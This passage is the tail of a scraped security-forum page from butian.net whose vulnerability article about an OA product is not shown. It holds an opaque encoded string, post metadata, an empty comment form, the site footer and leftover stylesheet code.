5r9Qu9aW/OfsrIaCuavxDoq77DInq4t6pfQZRyZc5SvfnqXraxj8ixOmOdqlr/GMou8TL8Oel+AdHWCI/bW1O9XTzl4rlyPzUZcc/HMLcvHn8o018idezDH+pyXNDxT+mdgya+Et18uXzPyff0vcZTeNL0ri39Q8jO1y4v9sI8Q9//zh0/EO63nSdzo133/EPoqH3GZLfuOj4Eo9D9m2XXD0162qqPaJc/KPvuEtuX9p2Pe9qD0
|
|||
|
|
</div>
|
|||
|
|
<div class="post-opt mt-30">
|
|||
|
|
<ul class="list-inline text-muted">
|
|||
|
|
<li>
|
|||
|
|
<i class="fa fa-clock-o"></i>
|
|||
|
|
发表于 2024-08-21 09:50:05
|
|||
|
|
</li>
|
|||
|
|
<li>阅读 ( 183 )</li>
|
|||
|
|
<li>分类:<a href=https://forum.butian.net/articles/OA target=_blank rel="noopenner noreferrer">OA产品</a>
|
|||
|
|
</li>
|
|||
|
|
<li><a href=# class=report_btn data-source_type=vulnerabilities_article data-source_id=526 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
|
|||
|
|
</ul>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="text-center mt-30 mb-20">
|
|||
|
|
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=article data-source_id=526 data-support_num=2> 2 推荐</button>
|
|||
|
|
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=article data-source_id=526> 收藏</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-answers mt-15">
|
|||
|
|
<h2 class="h4 post-title">0 条评论</h2>
|
|||
|
|
<div class=comment>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class="widget-comment-form row mb-20">
|
|||
|
|
<form class=col-md-12>
|
|||
|
|
<div class=form-group>
|
|||
|
|
<textarea id=comment-content name=content placeholder=写下你的评论 class=form-control value></textarea>
|
|||
|
|
</div>
|
|||
|
|
</form>
|
|||
|
|
<div class="col-md-12 text-right">
|
|||
|
|
|
|||
|
|
<button type=submit data-token=sKaWQokrOTC3iA9XXzaH65D8iBGicq4jNmsDOLZX data-source_id=526 data-source_type=article class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=text-center>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="col-xs-12 col-md-3 side" style=display:none>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<footer id=footer>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class=text-center>
|
|||
|
|
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
|
|||
|
|
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
|
|||
|
|
<a href=https://forum.butian.net/sitemap>sitemap</a>
|
|||
|
|
</div>
|
|||
|
|
<div class="copyright mt-10">
|
|||
|
|
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</footer>
|
|||
|
|
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
|
|||
|
|
|
|||
|
|
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-526 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span id=cnzz_stat_icon_1279782571></span>
|
|||
|
|
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
|
|||
|
|
* Pico.css v1.5.6 (https://picocss.com)
|
|||
|
|
* Copyright 2019-2022 - Licensed under MIT
|
|||
|
|
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
|